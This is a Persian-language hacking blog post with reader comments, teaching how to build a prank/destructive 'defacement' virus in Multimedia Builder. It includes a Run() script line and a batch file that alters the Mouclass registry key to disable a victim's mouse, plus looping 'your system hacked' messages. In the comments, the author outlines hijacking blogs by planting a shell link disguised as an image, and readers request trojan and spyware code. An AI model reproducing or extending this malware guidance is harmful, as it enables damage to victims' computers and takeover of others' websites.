ساخت ویروس با زبان MMB :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam
به درخواست یکی از دوستان در این پست به زبان mmb یا همون مولتی مدیا بیلدر ساخت ویروس هایی که سیستم هارو دیفیس میکنن رو برسی میکنیم
شما هم میتونید زبان دلخواهتون رو تو نظرات بگین تا با همان زبان برنامه نویسی هم یه ویروس مثل این رو آموزش بدم.
ابتدا ساخت صفحه دیفیس به این زبان رو یاد میگیریم بعد روش های غیر فعال کردن موس و کیبورد ، کپی شدن ویروس تو کل سیستم ، کدهای مخرب ، و ... رو با هم کار میکنیم.
mmb برنامه ساده و جذابیه که هر فرد آماتور و تازه کار هم میتونه خیلی راحت ازش استفاده کنه چون بیشتر کارها با ماوس انجام میشه و کد نویسی در اون خیلی کمتره
یعنی شما میتونید با چند تا کلیک برای خودتون برنامه درست کنید!!!

برای شروع کارمون mmb رو آتیش کنید و تغییرات زیر رو در صفحه تون انجام بدین
روی عکس کلیک کنید
Virus32
با انجام دادن این تنظیمات برنامه باعث میشه کل صفحه نمایش رو بگیره (دیفیس)
ما میتونیم تصویر یا نوشته یا حتی فیلم و صدا و هرچی که دلمون بخواد به دیفیسمون اضافه کنیم
Virus32
من یه Bitmap (عکس) به برنامه ام اضافه میکنم تا قشنگ تر بشه :)
خوب تا اینجا صفحه دیفیسمون آماده است
دیدین که کار خاصی نداشت
با این برنامه ما نمیتونیم موس و کیبورد رو غیر فعال کنیم چون قدرت کمتری داره
ولی میتونیم بهش دستور بدیم تا فایلی رو اجرا کنه.
برای همین ابتدا باید برنامه ای که موس و کیبورد رو غیر فعال میکنه رو آماده کنیم (با هر زبانی)
میتونیم از همون ویژوآل بیسیکی که در پست قبلی آموزشش رو دادم کمک بگیریم
و یا حتی میتونیم یه فایل bat درست کنیم و ...
بر فرض که فایل ما آماده است چجوری باید دستور اجرا شدنش رو به دیفیسمون بدیم؟
برای اینکار روی شکل کوچیک صفحه مون که در پایین قرار داره دوبار کلیک میکنیم تا تنظیمات صفحه نمایش داده بشه
Virus32
در این قسمت ما میتونیم رنگ صفحه و شکل موس و کد نویسی و بقیه اعمال رو انجام بدیم
به شکل دقت کنید
Virus32
در قسمت کد نویسی (Script) کد زیر رو وارد میکنیم
Run("*dis.bat","*dis.bat")
با این کد من دستور دادم تا فایلی به نام dis.bat رو از جایی که این برنامه قرار داره فراخوانی کرده اجراش کنه
بجای dis.bat میتونیم هر چیز دیگه ای رو هم فراخوانی کنیم
و یا میتونیم از این کد کپی بگیریم و چند تا فایل رو فراخوانی کنیم
محتویات فایل bat هم :
rem Virus32.blog.ir
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 3
rem Virus32.blog.ir

ما میتونیم به کمک این برنامه بد افزار های اعصاب خورد کن زیادی درست کنیم
و یا به همین برنامه ای که درست کردیم کدهای مخرب یا تو مخی اضافه کنیم
در پست های بعدی بیشتر درموردشون بحث خواهیم کرد

برنامه بدون کد مخرب
حجم: 680 کیلوبایت


به درخواست دوستان یه کد دیگه به برنامه اضافه میکنیم
این کد قراره پشت سر هم به قربانی اخطار نمایش بده و ...
برای اینکار کد زیر رو به قسمت Script صفحه اضافه کنید
ScriptTimer("Script","500")
سپس یه شئ Script هم از لیست به صفحه اضافه کنید و کدهای زیر رو بهش اضافه کنید

MessageEx("Virus32","your system hacked by Virus32")
MessageEx("Virus32","your system hacked by Virus32")
MessageEx("Virus32","your system hacked by Virus32")

با این کار برنامه سه بار پیام اخطار نمایش خواهد داد
شما میتونید هر چند تا که دلتون میخواد از این کد کپی بگیرین

نظر (۲۷)

سلام.
واقعا ممنونم خیییلی بدردم خورد واقعا که ادم هایی مثل تو دنیا تک و توک پیدا میشه :)
واقعا ممنونم.
Virus32 Virus 32 :
سلام
نظر لطفته عزیز خوشحالم که به دردت خورده
هورااااااا بعد مدت ها ویروس جون اومد اموزش های جدید بزاره
Virus32 Virus 32 :
;)
ویروس جون سلام. داداش من بار ها شنیدم و دیدم تو عکس شل میزارن o_O
داداش این شل ریختن تو عکس چجوریه ؟؟ که بعد با تمپر دیتا و لایو میتونن شل رو ران کنن ؟؟ میشه اموزش بدی؟؟؟ فداتم
Virus32 Virus 32 :
سلام عزیز
اون یه روش قدیمی برای هک وبلاگ بود که شل رو تو یه هاستی آپلود و بعد لینک آپلود شل رو به عکس تبدیل میکردیم (یعنی یه فرمت gif یا jpg ویا هر فرمت عکس دیگه به انتهای لینک شل اضافه میکردیم) بعد این لینک رو در وبلاگ یا وبسایت ها به عنوان کامنت قرار میدادیم چون نظرات بصورت مستقیم وارد مدیریت وبلاگ ها میشن لینک ما هم مستقیم بدون هیچ درخواستی وارد مدیریت میشد بعد طی یه مراحل عجیب غریبی لینک رو دوباره از عکس به لینک واقعیه شلمون برمیگردوندیم و با لایو میومدیم تو وبلاگ شلمون رو فراخوانی میکردیم و .... مدیریت وبلاگ :)
سلام خسته نباشید لطفا اگه زحمتی نیست به زبان C++ رو هم یاد بدید
Virus32 Virus 32 :
سلام ممنون چشم حتما
سلام من تازه وبلاگتون رو پیدا کردم یه عرض دیگه هم داشتم این که میشه آموزش ساخت یه ویروسی رو بدین که هی ارور بیاد و تعداد ارور ها رو هم خودمون مشخص کنیم میشه گفت یه ویروس سرکاری. :-) ممنون
Virus32 Virus 32 :
سلام
بله چرا نشه؟
همین پست رو آپدیت میکنم
سلام خسته نباشی دوست عزیز . من خیلی علاقه دارم هک یاد بگیرم و حتی حاضرم بخاطرش پول هم بدم . بزارید از چیزای ساده شروع کنم . برای مثال میشه لطفا راهنماییم کنید که چطور میشه وبلاگ رو هک کرد ؟ (از سیر تا پیاز) .. خواهش میکنم سوال منو بی جواب نزارید چون واقعا علاقه دارم و نیاز هم دارم . ممنون
Virus32 Virus 32 :
سلام ممنون
به کسی خصوصی چیزی یاد نمیدم نه پول لازم دارم نه حوصله شو
تو آشیانه کلاس های هک و امنیت میزارن شاید اونا بهتر باهاتون را بیان :)
سلام ویروس جان
داداش واقعا دستت طلا خیلی گلی به مولا

یه زحمتی دارم، تو یاهو مسنجر هستی کارت دارم به مدت 5 دقیقه
ممنون میشم جواب بدی داداشی

بازم میگم خیلی گلی
سلام ممنون راستی من تو انجمن آشیانه عضو هستم و من توش وارد میشم اما وقتی میرم مثلا یه مطلبی که برای اعضا فقط نشان داده میشه مثل لینک دانلود یا...میگه شما هنوز عضو نشده اید برای عضویت کلیک کنید اما درحالی که واردش هستم و اون بالا اسمم هست شما نمیدونید باید چیکار کنم یا مشکلش چیه؟؟؟ممنون
Virus32 Virus 32 :
سلام
نمیدونم والا اینو با مدیر یا مسئول آشیانه باید درمیون بزاری من به سیستم اونجا آشنا نیستم
سلام ویروس جان میشه با زبان C# هم یاد بدی؟
Virus32 Virus 32 :
سلام
باشه
سلام

یه امتحان گفتی هر زبان برنامه نویسی ای ؟؟؟؟؟؟؟؟

پس اسمبلی بزار ببینم پای حرفت میمونی
سلام چرا جواب نظر قبلیمو ندادی ؟؟؟
چطوری سیو کنم
Virus32 Virus 32 :
File
Compile
Locate
Save
Ok
سلام ببخشید شما اسکایپ دارید؟؟؟
Virus32 Virus 32 :
نه
سلام
مرسی از وب خوبتون
من دیفیس رو درست کردم و آهنگ هم روش گذاشتم و یه ارور با این کد :
do
x=msgbox("hacked")
Loop
اجرا هم میشه ولی میره پشت دیفیس و وقتی دیفیس بسته میشه ارور دیده میشه
چیکار کنم
Virus32 Virus 32 :
سلام
چرا پیام ارور رو توی خود برنامه نمینویسی؟
باید توی خود برنامه بنویسی تا نمایش بده
چون این برنامه ها بعد از اجرا تنها خودشون در اولویت قرار میگیرن و نمیزارن بقیه فایل ها و برنامه ها دیده شن
سلام من همون کارارو کردم ولی وقتی اجرا کردم این صفحه باز می شه
---------------------------------
http://s6.picofile.com/file/8233338026/Screenshot_7_.png
Virus32 Virus 32 :
سلام
به عکس دقت کن تیک دوتا گزینه زیر رو برنداشتی
standard window
Enable minimize
بالا سمت راست چپ مستطیل قرمزی که دوتا گزینه توشه
سلام
وب تون عالیه
داش این روش های بالا رو رفتم
حالا چطوری سیو کنیم
سیو میکنم اجرا میکنم هیچی نمیشه
لطفا جواب بده
Virus32 Virus 32 :
سلام
حتما فرمتش رو به درستی تغییر ندادی
این پست رو خوب بخون
سلام داداش خیلی از سایتتون رازی هستم..ولی یه درخواست داشتم..میشه یه راه سریع برای عووض کردن ای پی و ورود سریع به چت روم هارو معرفی کنید بدون اینکه کوکی پاک کنید و مودم خاموش کنیم..اگه میشه برنامهش یا راه حلش رو بگید مرسی
  • Virus32
  • DERAQOULA DERAQOULA
  • slm dash gofti soalamo inja beporsam.
    mishe amuzesh sakht uon pish shomare shahr ha va keshvar ha ro bezari mikham mese uon doros konam.vali ba taqirati dg mikham masalan shomare ke bezanim name ro neshon bede ya name ro ke benevisim shomare ro byare
    amuzesh ro ag mitoni baram befres tnx
    Virus32 Virus 32 :
    سلام عزیز
    اینو برای تو نوشتم :)
    سلام منم مرادی
    خوبی
    داداچ من دوباره اینو مشکل دارم هر چی می زارم تو دیفیس نمی یاد
    Virus32 Virus 32 :
    سلام عزیز
    کدوم قسمت؟
    پیام یا کلا دیفیس؟ 
    سلام
    .
    دستت درد نکنه کمتر کسی مثل تو پیدا میشه
    .
    .
    .
    .
    خواهشا ساخت ویروس به ربان ++C هم بزار
    .
    ممنون :)
    سلام، امشب سوالای ک تو دلم مونده بودو دارم میپرسم، البته وقت نبود بپرسما، داداش کدر یا داداش ویروس خواستم بگم ک این کدی ک میزنیم

    Run("*dis.bat","*dis.bat") به جای dis bat باید ادرس جایی ک فایل بت رو ساخیم بهش بدیم، بعدش قسمت اولش بنویسیم بعد یا باید حای دوتا dis bat بنویسیم، ممنون میشم بازم معذرت اگه اذیت میکنم با سوالا
    Virus32 Virus 32 :
    سلام عزیز
    بجای هردو dis.bat اسم برنامه خودتو بنویس بعد برنامه یا فایل bat رو کنار این برنامه ات قرار بده
    ممنون داداش ویروس، فقط اینکه بازم خجالت، یعنی وقتی ادرس دوتا فایل بتو نوشتم اونجا بعدش فایل اصلی بت رو هم همینجای ک این کدارو زدم بیارم؟ شرمنده عزیز
    Virus32 MR_C0D3R ‌ :
    آره باید کنارش باشه
    مگه نمیخوای ویروس بنویسی ؟
    نمیشه گفت برو از توی درایو سی بردار که
    باید بگی کنار برنامست و اسمشم فلان چیزه
    البته میتونی بهش آدرس هم بدی
    مرسی داداش کدر عزیز، دیگه کامل متوجه شدم، فکر میکردم باید ادرس فایل بدم بهش، بازم ممنون و لطف کردین
    برای نوشتن اتوران از autoplay Media studio استفاده کنید
    خیلی باحاله
    من یه تورجان نوشتم که راحت اپلود و دانلود میکنه و خیلی گستردست
    شاید همین نرم افزار باعث شد که من به برنامه نویسی علاقه پیداکنم
    اگر برنامه نویسی بلد نیستید از این برنامه استفاده کنید کد هاش از سی شارپ هم ساده تره خیلی نزدیک به سی شارپ هست دوتا کتاب هم در موردش هست خیلی معروفه
    خودم هم دارم یه کتاب در این مورد می نویسم که بعدها منتشر می کنم امید وارم که کمکی باشه به همه اون کسایی که میخوان اتوران بنویسن
    حرف کدر عزیز رو تکرار می کنم که هیج جیز جای برنامه نویسی رو نمیگیره
    سلام ببخشید میخواستم بدونم چجوری میشه یع کد جاسوسی تروجان نوشت؟
    اگع کسی میدونه لطفا به ایمیلم بفرسته raa7944@gmil.com ممنون.
    Virus32 MR_C0D3R ‌ :
    سلام ، تو وب بگردی
    مطمئنم یه چیزایی میتونی برای خودت درست کنی
  • Virus32
  • ★Mojτα多α★ Developer
  • این mmb آپدیت میده یا منقرض شده ؟ (:

    Virus32 ولم کنید (: :
    منقرض نشده.

    سلام ببخشید فکر کنم خودش ویروس بود نرم افزاره بزور پاکش کردم ویندوزم داش قاطی میکرد یا مشکل از نرم افزاره ممنون بابت سایت خوبتون

    Virus32 Ax0o 32 :
    خواهش میکنم
    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی